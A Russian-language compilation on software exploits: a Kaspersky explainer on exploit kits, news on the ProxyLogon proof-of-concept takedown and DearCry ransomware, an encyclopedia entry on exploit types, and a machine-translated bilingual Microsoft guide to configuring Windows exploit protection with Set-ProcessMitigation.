Содержание

Что такое эксплойты и почему их все так боятся?

Разработчики защитных решений часто упоминают в своих публикациях эксплойты как одну из самых серьезных проблем безопасности данных и систем, хотя и не всегда ясно, какова разница между эксплойтами и вредоносными программами в целом. Попробуем разобраться с этим вопросом.

Что такое эксплойт?

Эксплойты — это подвид вредоносных программ. Они содержат данные или исполняемый код, способный воспользоваться одной или несколькими уязвимостями в программном обеспечении на локальном или удаленном компьютере.

Например, у вас есть браузер, и есть уязвимость в нем, которая позволяет исполнить «произвольный код», то есть установить и запустить некую вредоносную программу на вашей системе без вашего ведома или спровоцировать какое-либо иное не ожидаемое вами поведение системы. Чаще всего первым шагом злоумышленников становится повышение привилегий, позволяющее делать в атакуемой системе все, что в голову взбредет.

Microsoft закрыла уязвимость нулевого дня в Windows и аж 41 дырку в Internet Explorer, но бреши еще остались: http://t.co/RzSNpPd3oH

— Kaspersky Lab (@Kaspersky_ru) February 12, 2015

Браузеры наряду с Flash, Java и Microsoft Office являются одними из самых подверженных атакам категорий программного обеспечения. Из-за их повсеместности их активно исследуют как эксперты по безопасности, так и хакеры, а разработчики браузеров вынуждены регулярно выпускать патчи для исправления уязвимостей. Лучше всего эти патчи устанавливать сразу, но, к сожалению, так происходит далеко не всегда — ведь при этом придется закрывать все вкладки.

Особую проблему, конечно, представляют собой эксплойты неизвестных уязвимостей, обнаруженных и использованных преступниками, — так называемые уязвимости нулевого дня. Может пройти много времени, прежде чем производители узнают о наличии проблемы и устранят ее.

Как происходит заражение

Следующая часть вполне техническая, так что не стесняйтесь проматывать, если только вам не в самом деле интересно, как это работает. Имейте в виду при этом, что киберпреступники часто предпочитают эксплойты прочим методам заражения, так как, в отличие от социальной инженерии, в которой все делается наудачу, эксплуатация уязвимостей неизменно дает желаемый результат.

Есть два способа «скормить» пользователям эксплойты. Во-первых, при посещении ими сайта, содержащего вредоносный код эксплойта. Во-вторых, при открытии пользователем безобидного на вид файла со скрытым вредоносным кодом. Как легко догадаться, во втором случае для доставки эксплойта, как правило, пользуются спамом или фишинговым письмом.

Почему фишинг получил такое распространение и как от него уберечься: http://t.co/sezy73TbSb

— Kaspersky Lab (@Kaspersky_ru) October 1, 2014

Как поясняется в статье Securelist, эксплойты предназначены для атаки конкретных версий программного обеспечения, содержащего уязвимости. Таким образом, если у пользователя нужная версия программного обеспечения при открытии вредоносного объекта или если веб-сайт использует это программное обеспечение для работы, то запускается эксплойт.

После того как он получает доступ посредством уязвимости, эксплойт загружает дополнительные вредоносные программы с сервера преступников, осуществляющие подрывную деятельность, такую как кража личных данных, использование компьютера в качестве элемента ботнета для рассылки спама или выполнения DDoS-атак и так далее.

Эксплойты представляют угрозу даже для осторожных и добросовестных пользователей, которые регулярно обновляют свое программное обеспечение. Причина кроется во временном зазоре между открытием уязвимости и выходом патча для ее исправления.

В этом интервале эксплойты могут свободно функционировать и угрожать безопасности почти всех интернет-пользователей при отсутствии установленных в системе автоматических средств предотвращения атак эксплойтов. Опять же, не будем забывать про синдром открытых вкладок — своевременное обновление программ зачастую требует от пользователя некоторых жертв, на которые не все готовы пойти сразу в момент выхода заплатки.

Эксплойты ходят стаями

Эксплойты часто упакованы вместе — так, чтобы проверить систему-мишень на широкий спектр уязвимостей. Как только выявляются одна или несколько, в дело вступают соответствующие эксплойты. Наборы эксплойтов также широко используют специальные методы запутывания кода (специалисты называют это умным словом «обфускация»), чтобы избежать обнаружения и замести интернет-адреса с целью помешать исследователям их вычислить.

Перечислим несколько наиболее известных наборов эксплойтов, или, как еще их называют, эксплойт-китов:

Angler — один из самых сложных наборов на черном рынке. Этот набор эксплойтов своим появлением изменил правила игры, после того как начал обнаруживать антивирусы и виртуальные машины (часто используемые экспертами по безопасности как приманки) и задействовать шифрованные файлы для затруднения исследования. Это один из тех наборов эксплойтов, которые быстрее всего включают в свой арсенал недавно открытые уязвимости нулевого дня, а его вредоносные программы работают в памяти, без записи на жестких дисках жертв. С техническим описанием пакета можно ознакомиться здесь.

В эксплойт-паке Angler появился 0-day-эксплойт для Flash https://t.co/XC09OunPKY pic.twitter.com/1PhFaa7iTT

— Евгений Касперский (@e_kaspersky_ru) January 23, 2015

Nuclear Pack — поражает жертв эксплойтами Java и Adobe PDF, а также подсаживает Caphaw — печально известный банковский троян. Подробнее читайте здесь.

Neutrino — набор от русскоязычных разработчиков, содержащий несколько эксплойтов Java. Neutrino прославился в прошлом году в связи с тем, что владелец выставил его на продажу по очень скромной цене — $34 тыс. Скорее всего, это было сделано после ареста некоего Paunch, создателя следующего набора, о котором мы хотим поговорить.

Blackhole Kit — наиболее распространенная веб-угроза в 2012 году, нацеленная на уязвимости в старых версиях браузеров Firefox, Chrome, Internet Explorer и Safari, а также многих популярных плагинов, таких как Adobe Flash, Adobe Acrobat и Java. После того как жертву заманили или перенаправили на страницу подсадки, запутанный JavaScript определяет содержимое машины жертвы и загружает те эксплойты, для которых данный компьютер уязвим.

Автор эксплойт-кита Blackhole арестован в России http://t.co/ueTC9k5NvX

— Евгений Касперский (@e_kaspersky_ru) October 9, 2013

Blackhole, в отличие от большинства других эксплойт-китов, даже удостоился отдельной статьи в «Википедии», хотя после ареста вышеупомянутого Paunch сам набор практически вышел в тираж.

Вывод

Как сказано выше, эксплойты — подвид вредоносных программ, но они обнаруживаются не всеми защитными программами. Для успешного обнаружения необходимо, чтобы защитное решение использовало поведенческий анализ — это единственный надежный метод борьбы с эксплойтами. Вредоносные программы могут быть многочисленными и разнообразными, но большинство из них имеют похожие черты поведения.

Что такое эксплойты и почему их все так боятся?

Tweet

Подобный метод используется в Kaspersky Internet Security и других продуктах «Лаборатории Касперского» — соответствующая часть наших защитных решений называется «Автоматическая защита от эксплойтов» (или AEP — Automatic Exploit Prevention). Характерное поведение эксплойтов помогает предотвратить заражение даже в случае эксплуатации ранее неизвестной уязвимости нулевого дня.

Более подробную информацию о технологии Automatic Exploit Prevention можно найти здесь.

GitHub удалил эксплоит для ProxyLogon и подвергся критике — «Хакер»

Вчера мы писали о том, что независимый ИБ-исследователь из Вьетнама опубликовал на GitHub первый настоящий PoC-эксплоит для серьезного комплекса уязвимостей ProxyLogon, недавно обнаруженных в Microsoft Exchange. Работоспособность этого эксплоита подтвердили известные эксперты, включая Маркуса Хатчинса из Kryptos Logic, Дэниела Карда из PwnDefend и Джона Уэтингтона из Condition Black.

При этом многие отмечали, что публичный релиз PoC-эксплоита сейчас – это крайне сомнительный шаг. К примру, совсем недавно компанию Praetorian подвергли жесткой критике за куда меньший «проступок»: ее специалисты лишь обнародовали подробный обзор уязвимостей ProxyLogon, хотя воздержалась от выпуска собственного эксплоита.

Дело в том, что в настоящее время по меньшей мере десять хак-групп эксплуатируют ошибки ProxyLogon для установки бэкдоров на серверы Exchange по всему миру. По разным оценкам, количество пострадавших компаний и организаций уже достигло 30 000-100 000, и их число постоянно продолжает расти, равно как и количество атакующих.

Учитывая всю серьезность ситуации, уже через несколько часов после публикации эксплоита тот был удален с GitHub администрацией сервиса. Из-за этого некоторые участники ИБ-сообщества пришли в ярость и немедленно обвинили Microsoft в цензуре контента, представляющего жизненный интерес для специалистов по безопасности со всего мира.

Так, многие исследователи говорят, что GitHub придерживается двойных стандартов, которые позволяют компании использовать PoC-эксплоиты для исправления уязвимостей, влияющих на ПО других компаний, но при этом аналогичные PoC для продуктов Microsoft удаляются.

«Ух ты. У меня нет слов. Microsoft действительно удалила PoC-код с GitHub.  Это чудовищно, удалить с GitHub код ИБ-исследователя, направленный на их собственный продукт, который уже получил патчи», — пишет в Twitter Дэйв Кеннеди, основатель компании TrustedSec.

В той же социальной сети эксперт Google Project Zero Тэвис Орманди спорит с Маркусом Хатчинсом. Последний говорит, что не совсем понимает, какую пользу могла принести хоть кому-то публикация работающего RCE-эксплоита, на что Орманди отвечает:

«Есть ли польза от Metasploit, или буквально все, кто его используют — скрипткидди? К сожалению, невозможно поделиться исследованиями и инструментами с профессионалами, не поделившись ими еще и со злоумышленниками, но многие люди (например, я) считают, что преимущества перевешивают риски».

В свою очередь Хатчинс пишет, что аргумент об уже исправленных уязвимостях несостоятелен, так как около 50 000 серверов по всему миру по-прежнему уязвимы.

«”Уже вышли патчи”. Чувак, есть более 50 000 непропатченных серверов Exchange. Выпуск полностью готовой к работе цепочки RCE — это не исследование безопасности, это безрассудство и глупость.

Я и раньше видел, как GitHub удаляет вредоносный код, и не только код, нацеленный на продукты Microsoft.  Очень сомневаюсь, что MS сыграла какую-то роль в этом удалении, [эксплоит] просто нарушал политику GitHub в отношении активного вредоносное ПО или эксплоитов, ведь он появился совсем недавно, а над огромным количеством серверов нависла угроза атак вымогателей», — говорит Хатчинс.

Представители GitHub сообщили журналистам, что эксплоит, конечно, имел образовательную и исследовательскую ценность для сообщества, однако компания вынуждена поддерживать баланс и помнить о необходимости сохранения безопасности более широкой экосистемы. Поэтому, в соответствии с правилами сервиса, эксплоит для недавно обнаруженной уязвимости, которая прямо сейчас активно используется для атак, все же был удален из открытого доступа.

Серверы Microsoft Exchange атакуют шифровальщики, а для ProxyLogon появился новый эксплоит

Злоумышленники продолжают атаки на уязвимые перед багами ProxyLogon серверы Microsoft Exchange.

В настоящее время по меньшей мере десять хак-групп эксплуатируют ошибки ProxyLogon для установки бэкдоров на серверы Exchange по всему миру. По разным оценкам, количество пострадавших компаний и организаций уже достигло 30 000-100 000, и их число постоянно продолжает расти, равно как и количество атакующих.

Хуже того, по подсчетам экспертов Palo Alto Networks и Microsoft, в сети по-прежнему доступны около 80 000 уязвимых серверов Exchange, которые можно скомпрометировать.

В начале марта 2021 года инженеры Microsoft выпустили внеплановые патчи для четырех уязвимостей в почтовом сервере Exchange, которым исследователи дали общее название ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065).

Эти уязвимости можно объединить в цепочку, а их эксплуатация позволит злоумышленнику пройти аутентификацию на сервере Exchange, получить права администратора, установить малварь и похитить данные.

Шифровальщик

Как сообщает создатель ID-Ransomware Майкл Гиллеспи, на уязвимые серверы уже устанавливают не только веб-шеллы и майнеры, но и шифровальщики. Пока таких пострадавших насчитывается всего шесть (в Австрии, Австралии, Канаде, Дании и США).

🚨 #Exchange Servers Possibly Hit With #Ransomware 🚨
ID Ransomware is getting sudden swarm of submissions with «.CRYPT» and filemarker «DEARCRY!» coming from IPs of Exchange servers from US, CA, AU on quick look. pic.twitter.com/wPCu2v6kVl

— Michael Gillespie (@demonslay335) March 11, 2021

Шифровальщику дали имя DearCry и, похоже, он атакует преимущественно небольшие компании. Во всяком случае, такую информацию сообщает в своем Twitter MalwareHunterTeam.

Also, not yet seen any new samples of this DearCry ransomware after the 3 samples that were uploaded to VT on the 9th (hashes of those samples already made public yesterday here: https://t.co/LKHhQL9MZM).

— MalwareHunterTeam (@malwrhunterteam) March 12, 2021

Известно, что малварь добавляет к файлам на сервере дополнительное  расширение . CRYPT и требует выкуп в размере от 50 000 до 110 000 долларов. При этом издание The Record пишет, что по оценкам ИБ-экспертов, этот вымогатель явно был создан в спешке и не имеет отношения к крупным и хорошо известным хак-группам.

Новые эксплоиты

Как мы писали на прошлой неделе, с GitHub был удален полноценный PoC-эксплоит для ProxyLogon, созданный независимым ИБ-исследователем из Вьетнама. Удаление инструмента вызвало немало споров в сообществе, а исследователь заявлял, что эксплоит был преднамеренно создан с ошибками. Однако его все равно удалили, а в компании заявили, нужно «помнить о необходимости сохранения безопасности более широкой экосистемы». То есть публиковать в открытом доступе эксплоит для подобной проблемы, когда уязвимо огромное количество серверов, – не слишком хорошая идея.

Как теперь пишет издание Bleeping Computer, в минувшие выходные другой неназванный исследователь опубликовал в сети еще один PoC-эксплоит для ProxyLogon. Это решение требует лишь небольшой модификации для использования с целью установки веб-шеллов.

Аналитик CERT/CC Уилл Дорман сообщил журналистам, что данный эксплоит требует минимальных изменений, и теперь ProxyLogon «доступен даже для скрипткидди».

На скриншотах ниже видно, как  Дорман использовал эксплоит против сервера Microsoft Exchange, удаленно установил на него веб-шелл и выполнил команду whoami; доставил веб-шелл teset11.aspx в определенное место на сервере.

Эксплойт, Exploit

Эксплойты (exploits) являются подвидом вредоносных программ. Термин связан с английским глаголом «to exploit», означающим «эксплуатировать, применять в своих интересах». Впрочем, эксплойт — это не обязательно отдельное приложение (исполняемый файл): он может иметь вид небольшого фрагмента вредоносного кода или набора команд, выполняемых в определенном порядке. Используя уязвимость в какой-либо системной или прикладной программе, эксплойт производит на устройстве жертвы несанкционированное действие. Как правило, оно позволяет повысить привилегии в целевой системе или выполнить произвольный код.

Цели работы эксплойта разнообразны: загрузка и установка вредоносных программ, повышение прав доступа, остановка работы системы, раскрытие конфиденциальных данных. Следует заметить, что сами эксплойты не осуществляют деструктивных действий напрямую: их задача — воспользоваться уязвимостью, чтобы обеспечить запуск вложенного в них кода. Все последующие операции выполняет именно вредоносная нагрузка, и от ее содержания зависит то, какой цели достигнет злоумышленник.

Классификация эксплойтов

Эксплойты (exploits) могут применяться к любым элементам компьютерной системы. Объектом атаки могут быть модули операционной системы, прикладные программы и даже аппаратные компоненты. Для успешной атаки необходимо заставить жертву перейти по ссылке, загрузить и открыть файл, чтобы эксплойт получил возможность проэксплуатировать нужную уязвимость.

Поскольку эксплойты разрабатываются для осуществления разных действий на зараженной системе, их можно классифицировать по объекту назначения:

  • для браузеров и дополнений к ним;
  • для операционных систем;
  • для офисных программ, проигрывателей и другого прикладного программного обеспечения;
  • для серверного программного обеспечения;
  • для веб-сервисов, например WordPress, Joomla, Drupal;
  • для аппаратных компонентов.

Эксплойты попадают в компьютер пользователя разными способами. В частности, может произойти прямое вмешательство злоумышленника в систему. Если сетевого доступа к атакуемой системе нет, то высылается письмо на электронную почту или сообщение через мессенджер со ссылкой на вредоносный код.

Объект воздействия

Эксплойты, являясь подвидом вредоносных программ, используются для воздействия на компьютерные устройства разных пользователей. Это могут быть машины коммерческих компаний, государственных структур, различных организаций. Также при помощи эксплойтов злоумышленники проникают в компьютерные системы рядовых пользователей для кражи личной информации, особенно имеющей отношение к финансам.

Источник угрозы

Создаются эксплойты киберпреступниками высокой квалификации, которые продают их на черном рынке другим злоумышленникам. В качестве элементов кибероружия они разрабатываются и используются спецслужбами.

Также эксплойты могут быть результатом работы специалистов по информационной безопасности, желающих показать, каким образом может эксплуатироваться обнаруженная ими уязвимость. В этом случае производители ПО оповещаются об уязвимостях до публикации эксплойта в открытом доступе.

Наконец, эксплойты иногда разрабатываются студентами и начинающими программистами для совершенствования своих умений.

Анализ риска

Несмотря на старания специалистов, уязвимости есть практически во всех программах, а значит, для злоумышленников всегда есть лазейка для подготовки эксплойта. К моменту, когда разработчики выпустят патч (небольшую программу для исправления уязвимых файлов), вредоносная программа может нанести огромный урон. Под угрозу попадают все пользователи, включая самых осторожных и внимательных.

Последствия применения эксплойта могут быть самыми разными. Это зависит от задачи, которая ставилась перед вредоносными программами: от нарушения работы системы до потери крупных денежных сумм, секретной информации.

Обезопасить свое устройство от эксплойта можно, если пользоваться антивирусными программами от известных компаний, которые постоянно совершенствуют свои продукты. Снизят риски заражения регулярное обновление операционной системы и прикладных программ, отказ от переходов по подозрительным ссылкам, игнорирование спам-сообщений, внимательное отношение к финансовым операциям.

 

Включив защиту от эксплойтов, чтобы уменьшить риск атак

  • Чтение занимает 9 мин

В этой статье

Область применения:Applies to:

Хотите испытать Defender для конечной точки?Want to experience Defender for Endpoint? Зарегистрився для бесплатной пробной.Sign up for a free trial.

Защита от эксплойтов помогает защититься от вредоносных программ, которые используют эксплойты для заражения устройств и распространения. Exploit protection helps protect against malware that uses exploits to infect devices and spread. Защита от эксплойтов состоит из ряда смягчающих последствий, которые можно применить к операционной системе или отдельным приложениям.Exploit protection consists of a number of mitigations that can be applied to either the operating system or individual apps.

Важно!

.NET 2.0 не совместима с некоторыми возможностями защиты от эксплойтов, в частности, фильтрацией адресов экспорта (EAF) и фильтрацией адресов импорта (IAF)..NET 2.0 is not compatible with some exploit protection capabilities, specifically, Export Address Filtering (EAF) and Import Address Filtering (IAF). Если вы включили .NET 2.0, использование EAF и IAF не поддерживается.If you have enabled .NET 2.0, usage of EAF and IAF are not supported.

В защиту эксплойтов включены многие функции набор средств (EMET).Many features from the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit protection.

Каждое смягчение можно включить отдельно, используя любой из этих методов:You can enable each mitigation separately by using any of these methods:

Защита от эксплойта настраивается по умолчанию в Windows 10.Exploit protection is configured by default in Windows 10. Вы можете настроить каждое смягчение, чтобы включить, отключить или значение по умолчанию.You can set each mitigation to on, off, or to its default value. Некоторые меры по смягчению последствий имеют дополнительные параметры.Some mitigations have additional options.

Эти параметры можно экспортировать в качестве XML-файла и развертывать на других устройствах.You can export these settings as an XML file and deploy them to other devices.

Вы также можете настроить смягчение последствий в режим аудита.You can also set mitigations to audit mode. Режим аудита позволяет проверить, как будут работать меры по смягчению последствий (и обзор событий), не влияя на нормальное использование устройства.Audit mode allows you to test how the mitigations would work (and review events) without impacting the normal use of the device.

Приложение Безопасности WindowsWindows Security app

  1. Откройте приложение Windows Security, выбрав значок щита в панели задач или нажав меню пусков для безопасности.Open the Windows Security app by selecting the shield icon in the task bar or by searching the start menu for Security.

  2. Выберите плитку управления & браузера (или значок приложения в левой панели меню), а затем выберите параметры защиты exploit.Select the App & browser control tile (or the app icon on the left menu bar) and then select Exploit protection settings.

  3. Перейдите к настройкам программы и выберите приложение, к которое необходимо применить меры по смягчению последствий.Go to Program settings and choose the app you want to apply mitigations to.

    • Если приложение, которое нужно настроить, уже перечислены, выберите его и выберите Изменить. If the app you want to configure is already listed, select it, and then select Edit.
    • Если приложение не включено в список, в верхней части списка выберите программу Добавить для настройки, а затем выберите, как вы хотите добавить приложение.If the app is not listed, at the top of the list select Add program to customize and then choose how you want to add the app.
    • Используйте Add по имени программы, чтобы смягчение было применено к любому запущенного процесса с этим именем.Use Add by program name to have the mitigation applied to any running process with that name. Необходимо указать файл с расширением.You must specify a file with an extension. Вы можете ввести полный путь, чтобы ограничить смягчение только приложение с этим именем в этом расположении.You can enter a full path to limit the mitigation to only the app with that name in that location.
    • Выберите точный путь к файлу, чтобы использовать стандартное окно выбора файлов Windows Explorer для поиска и выбора нужного файла.Use Choose exact file path to use a standard Windows Explorer file picker window to find and select the file you want.
  4. После выбора приложения вы увидите список всех смягчающих последствий, которые можно применить.After selecting the app, you’ll see a list of all the mitigations that can be applied. Выбор аудита будет применяться только в режиме аудита.Choosing Audit will apply the mitigation in audit mode only. Вы будете уведомлены о необходимости перезапуска процесса или приложения или о необходимости перезапуска Windows.You are notified if you need to restart the process or app, or if you need to restart Windows.

  5. Повторите действия 3-4 для всех приложений и смягчения последствий, которые необходимо настроить.Repeat steps 3-4 for all the apps and mitigations you want to configure.

  6. В разделе Параметры системы найдите решение, необходимое для настройки, а затем укажите один из следующих параметров.Under the System settings section, find the mitigation you want to configure and then specify one of the following settings. Приложения, которые не настроены отдельно в разделе Параметры программы, используют параметры, настроенные здесь.Apps that aren’t configured individually in the Program settings section use the settings that are configured here.

    • По умолчанию: смягчение включено для приложений, которые не имеют этого набора смягчения в разделе параметры программы для определенных приложений.On by default: The mitigation is enabled for apps that don’t have this mitigation set in the app-specific Program settings section
    • Отключение по умолчанию: смягчение отключено для приложений, у них нет этого набора смягчения в разделе параметры программы для определенных приложений.Off by default: The mitigation is disabled for apps that don’t have this mitigation set in the app-specific Program settings section
    • Использование по умолчанию: смягчение может быть включено или отключено в зависимости от конфигурации по умолчанию, настроенной установкой Windows 10; значение по умолчанию (On or Off) всегда указывается рядом со меткой Использование по умолчанию для каждого смягченияUse default: The mitigation is either enabled or disabled, depending on the default configuration that is set up by Windows 10 installation; the default value (On or Off) is always specified next to the Use default label for each mitigation
  7. Повторите шаг 6 для всех системных смягчений, которые необходимо настроить.Repeat step 6 for all the system-level mitigations you want to configure. Выберите Применить, когда вы закончили настройку конфигурации.Select Apply when you’re done setting up your configuration.

Если вы добавите приложение в раздел Параметры программы и настроите там отдельные параметры смягчения, они будут соблюдаться выше конфигурации для тех же смягчений, указанных в разделе Параметры системы.If you add an app to the Program settings section and configure individual mitigation settings there, they will be honored above the configuration for the same mitigations specified in the System settings section. В следующей матрице и примерах показано, как работают по умолчанию:The following matrix and examples help to illustrate how defaults work:

Пример 1. Mikael настраивает предотвращение выполнения данных в разделе параметры системы, отключенной по умолчаниюExample 1: Mikael configures Data Execution Prevention in system settings section to be off by default

Микаэль добавляет приложение test.exe в раздел Параметры программы.Mikael adds the app test.exe to the Program settings section. В параметрах для этого приложения в статье Предотвращение выполнения данных (DEP) Mikael включает параметр параметры системы Override и задает переключатель На.In the options for that app, under Data Execution Prevention (DEP), Mikael enables the Override system settings option and sets the switch to On. В разделе Параметры программы не указаны другие приложения.There are no other apps listed in the Program settings section.

В результате deP включен только для test.exe.The result is that DEP is enabled only for test.exe. Все другие приложения не будут применяться к DEP.All other apps will not have DEP applied.

Пример 2. Josie настраивает предотвращение выполнения данных в параметрах системы, отключенных по умолчаниюExample 2: Josie configures Data Execution Prevention in system settings to be off by default

Джози добавляет приложение test.exe в раздел Параметры программы.Josie adds the app test.exe to the Program settings section. В параметрах для этого приложения в статье Предотвращение выполнения данных (DEP) Josie включает параметр параметры системы Override и задает переключатель На.In the options for that app, under Data Execution Prevention (DEP), Josie enables the Override system settings option and sets the switch to On.

Джози также добавляет приложениеmiles.exe в раздел Параметры программы и настраивает службу управления потоком (CFG) в On.Josie also adds the app miles.exe to the Program settings section and configures Control flow guard (CFG) to On. Josie не включает параметры системы Override для DEP или любые другие меры по смягчению последствий для этого приложения.Josie doesn’t enable the Override system settings option for DEP or any other mitigations for that app.

В результате deP включен для test.exe.The result is that DEP is enabled for test.exe. DEP не будет включен для любого другого приложения, включая miles.exe.DEP will not be enabled for any other app, including miles.exe. CFG будет включен для miles.exe.CFG will be enabled for miles.exe.

  1. Откройте приложение Windows Security, выбрав значок щита в панели задач или нажав меню пусковых пусков для Defender.Open the Windows Security app by selecting the shield icon in the task bar or searching the start menu for Defender.

  2. Выберите плитку управления & браузера (или значок приложения в левой панели меню), а затем выберите защиту exploit.Select the App & browser control tile (or the app icon on the left menu bar) and then select Exploit protection.

  3. Перейдите к настройкам программы и выберите приложение, к которое необходимо применить меры по смягчению последствий.Go to Program settings and choose the app you want to apply mitigations to.

    • Если приложение, которое нужно настроить, уже перечислены, выберите его и выберите Изменить.If the app you want to configure is already listed, select it, and then select Edit.
    • Если приложение не включено в список, в верхней части списка выберите программу Добавить для настройки, а затем выберите, как вы хотите добавить приложение.If the app is not listed, at the top of the list select Add program to customize and then choose how you want to add the app.
    • Используйте Add по имени программы, чтобы смягчение было применено к любому запущенного процесса с этим именем.Use Add by program name to have the mitigation applied to any running process with that name. Необходимо указать файл с расширением.You must specify a file with an extension. Вы можете ввести полный путь, чтобы ограничить смягчение только приложение с этим именем в этом расположении.You can enter a full path to limit the mitigation to only the app with that name in that location.
    • Выберите точный путь к файлу, чтобы использовать стандартное окно выбора файлов Windows Explorer для поиска и выбора нужного файла.Use Choose exact file path to use a standard Windows Explorer file picker window to find and select the file you want.
  4. После выбора приложения вы увидите список всех смягчающих последствий, которые можно применить.After selecting the app, you’ll see a list of all the mitigations that can be applied. Выбор аудита будет применяться только в режиме аудита.Choosing Audit will apply the mitigation in audit mode only. Вы будете уведомлены о необходимости перезапустить процесс или приложение или перезапустить Windows.You will be notified if you need to restart the process or app, or if you need to restart Windows.

  5. Повторите действия 3-4 для всех приложений и смягчения последствий, которые необходимо настроить.Repeat steps 3-4 for all the apps and mitigations you want to configure. Выберите Применить, когда вы закончили настройку конфигурации.Select Apply when you’re done setting up your configuration.

IntuneIntune

  1. Вопишитесь на портал Azure и откройте Intune.Sign in to the Azure portal and open Intune.

  2. Перейдите к профилям > конфигурации устройств > Создайте профиль.Go to Device configuration > Profiles > Create profile.

  3. Назови профиль, выберите Windows 10 и более поздний и endpoint protection.Name the profile, choose Windows 10 and later and Endpoint protection.


  4. Выберите Настройка Защитник Windows защита от > эксплойтов > guard.Select Configure > Windows Defender Exploit Guard > Exploit protection.

  5. Загрузите XML-файл с настройками защиты от эксплойтов:Upload an XML file with the exploit protection settings:


  6. Выберите ОК, чтобы сохранить каждое открытое лезвие, а затем выберите Создать.Select OK to save each open blade, and then choose Create.

  7. Выберите вкладку Назначения профилей, назначьте политику всем пользователям & всем устройствам, а затем выберите Сохранить.Select the profile Assignments tab, assign the policy to All Users & All Devices, and then select Save.

MDMMDM

Используйте поставщик услуг конфигурации ./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings (CSP), чтобы включить или отключить смягчение последствий защиты от эксплуатации или использовать режим аудита.Use the ./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings configuration service provider (CSP) to enable or disable exploit protection mitigations or to use audit mode.

Менеджер конечных точек МайкрософтMicrosoft Endpoint Manager

  1. В Microsoft Endpoint Manager перейдите к уменьшению поверхности endpoint > Security Attack.In Microsoft Endpoint Manager, go to Endpoint Security > Attack surface reduction.

  2. Выберите создание > платформы политики, а для профиля выберите защиту от эксплойтов.Select Create Policy > Platform, and for Profile, choose Exploit Protection. Затем нажмите кнопку Создать.Then select Create.

  3. Укажите имя и описание, а затем выберите Далее.Specify a name and a description, and then choose Next.

  4. Выберите XML-файл и просмотрите расположение XML-файла защиты от эксплойтов.Select Select XML File and browse to the location of the exploit protection XML file. Выберите файл, а затем выберите Далее.Select the file, and then choose Next.

  5. Настройка тегов Области и назначений при необходимости.Configure Scope tags and Assignments if necessary.

  6. В обзоре + создайте, просмотрите конфигурацию и выберите Создать.Under Review + create, review the configuration and then choose Create.

Microsoft Endpoint Configuration ManagerMicrosoft Endpoint Configuration Manager

  1. В Microsoft Endpoint Configuration Manager перейдите в службу Assets and > Compliance Endpoint Protection Защитник Windows Exploit > Guard.In Microsoft Endpoint Configuration Manager, go to Assets and Compliance > Endpoint Protection > Windows Defender Exploit Guard.

  2. Выберите > домашнее создание политики защиты от эксплойтов.Select Home > Create Exploit Guard Policy.

  3. Укажите имя и описание, выберите защиту exploit и выберите Далее.Specify a name and a description, select Exploit protection, and then choose Next.

  4. Просмотрите расположение XML-файла защиты от эксплойтов и выберите Далее.Browse to the location of the exploit protection XML file and select Next.

  5. Просмотрите параметры и выберите Далее, чтобы создать политику.Review the settings, and then choose Next to create the policy.

  6. После создания политики выберите Close.After the policy is created, select Close.

Групповая политикаGroup Policy

  1. На устройстве управления групповой политикой откройте консоль управления групповой политикой правойкнопкой мыши объект групповой политики, который необходимо настроить, и нажмите кнопку Изменить.On your Group Policy management device, open the Group Policy Management Console, right-click the Group Policy Object you want to configure and click Edit.

  2. В редакторе управления групповой политикой перейдите к конфигурации компьютера и выберите административные шаблоны.In the Group Policy Management Editor go to Computer configuration and select Administrative templates.

  3. Расширь дерево до компонентов Windows Защитник Windows защита от эксплойтов > Exploit > Guard Use a common set of exploit protection > settings.Expand the tree to Windows components > Windows Defender Exploit Guard > Exploit Protection > Use a common set of exploit protection settings.

  4. Выберите включено и введите расположение XML-файла,а затем выберите ОК.Select Enabled and type the location of the XML file, and then choose OK.

PowerShellPowerShell

Вы можете использовать глагол PowerShell Get или Set с помощью ProcessMitigation команды.You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation. Использование будет перечислять текущее состояние конфигурации любых смягчений, которые были включены на устройстве — добавьте Get cmdlet и exe приложения, чтобы увидеть смягчения только для -Name этого приложения:Using Get will list the current configuration status of any mitigations that have been enabled on the device — add the -Name cmdlet and app exe to see mitigations for just that app:

Get-ProcessMitigation -Name processName.exe

Важно!

Не настроенные на системном уровне меры по смягчению последствий будут показывать состояние NOTSET .System-level mitigations that have not been configured will show a status of NOTSET.

  • Для параметров системного уровня указывается параметр по умолчанию для этого NOTSET смягчения.For system-level settings, NOTSET indicates the default setting for that mitigation has been applied.
  • Для параметров уровня приложения указывается, что параметр системного уровня для смягчения будет NOTSET применен.For app-level settings, NOTSET indicates the system-level setting for the mitigation will be applied. Параметр по умолчанию для каждого смягчения на уровне системы можно увидеть в Windows Security.The default setting for each system-level mitigation can be seen in the Windows Security.

Используйте Set для настройки каждого смягчения в следующем формате:Use Set to configure each mitigation in the following format:

Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>

Где:Where:

  • <Scope>:<Scope>:
    • -Name чтобы указать, какие меры по смягчению последствий должны применяться к определенному приложению.-Name to indicate the mitigations should be applied to a specific app. Укажите исполняемое приложение после этого флага.Specify the app’s executable after this flag.
      • -System чтобы указать, что смягчение должно применяться на уровне системы-System to indicate the mitigation should be applied at the system level
  • <Action>:<Action>:
    • -Enable чтобы включить смягчение-Enable to enable the mitigation
    • -Disable отключение смягчения-Disable to disable the mitigation
  • <Mitigation>:<Mitigation>:
    • Комлет смягчения наряду с любыми подопциями (в окружении пробелов).The mitigation’s cmdlet along with any suboptions (surrounded with spaces). Каждое смягчение разделено запятой.Each mitigation is separated with a comma.

Например, чтобы включить смягчение меры по предотвращению выполнения данных (DEP) с помощью эмуляции thunk ATL и для исполняемого под названием testing.exe в папке C:\Apps\LOB\tests, а также предотвратить создание детских процессов, необходимо использовать следующую команду:For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk emulation and for an executable called testing.exe in the folder C:\Apps\LOB\tests, and to prevent that executable from creating child processes, you’d use the following command:

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation

Важно!

Разделите каждый вариант смягчения с запятой.Separate each mitigation option with commas.

Если вы хотите применить DEP на уровне системы, вы используете следующую команду:If you wanted to apply DEP at the system level, you’d use the following command:

Set-Processmitigation -System -Enable DEP

